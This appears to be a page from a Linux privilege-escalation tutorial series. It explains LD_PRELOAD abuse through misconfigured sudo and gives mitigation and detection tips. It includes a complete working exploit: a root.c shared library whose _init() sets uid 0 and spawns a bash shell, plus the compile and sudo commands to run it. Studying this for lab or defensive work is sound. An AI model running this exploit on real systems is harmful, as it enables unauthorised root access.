19.Shared-libraries

Check Sudo Privileges

sudo -l

Create Malicious Shared Library (root.c)

cat > root.c << EOF
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
EOF

Compile Shared Library

gcc -fPIC -shared -o root.so root.c -nostartfiles

Exploit LD_PRELOAD (replace with actual sudo command)

sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart

Verify Root Access

id
whoami

Example Using LD_LIBRARY_PATH (Less Common, but Possible)

# Create a malicious library in a directory you control
# Compile it like above
# LD_LIBRARY_PATH=/path/to/malicious/lib sudo /path/to/vulnerable/binary

List Shared Library Dependencies

ldd /bin/ls

Key Concepts:

  • Shared Libraries (.so):

    • Dynamically linked libraries used by programs.

    • Can be modified to alter program behavior.

  • LD_PRELOAD:

    • Environment variable that loads a library before others.

    • Allows overriding functions in other libraries.

  • ldd:

    • Utility to list a program's shared library dependencies.

  • Sudo and LD_PRELOAD:

    • If sudo allows LD_PRELOAD to be kept in the environment, it can be exploited.

Exploitation Steps (as described):

  1. Identify Sudo Privileges:

    • sudo -l: Check for commands the user can run as root.

    • Look for commands that can be exploited with LD_PRELOAD.

  2. Create Malicious Shared Library:

    • Write C code to execute a shell as root.

    • Use _init() to ensure the code executes when the library is loaded.

    • Use unsetenv("LD_PRELOAD"); to clean up the environment to avoid issues with child processes.

  3. Compile Shared Library:

    • gcc -fPIC -shared -o root.so root.c -nostartfiles

  4. Exploit LD_PRELOAD:

    • sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart (replace with the correct path and sudo command)

  5. Verify Root Access:

    • id

Important Considerations and Enhancements:

  • Sudo Configuration:

    • The env_keep+=LD_PRELOAD in /etc/sudoers is crucial for this exploit.

    • Many systems will clean the environment.

  • Library Loading Order:

    • LD_PRELOAD takes precedence over other library loading mechanisms.

  • Function Overriding:

    • LD_PRELOAD can be used to override specific functions in other libraries.

  • Security Implications:

    • This is a significant security risk.

    • Proper sudo configuration is essential.

  • Mitigation:

    • Remove env_keep+=LD_PRELOAD from /etc/sudoers.

    • Use secure paths in sudo configurations.

    • Regularly audit sudo configurations.

  • Detection:

    • Monitor for unexpected LD_PRELOAD usage.

    • Audit sudo configurations.

    • Use intrusion detection systems.

  • Real world examples: Researching real world LD_PRELOAD exploits will help solidify understanding of the attack vectors.

  • Other environment variables: Other environment variables can be missused, such as LD_LIBRARY_PATH.

Previous18.Kernel-exploitsNext20.Shared-object-hijacking

Last updated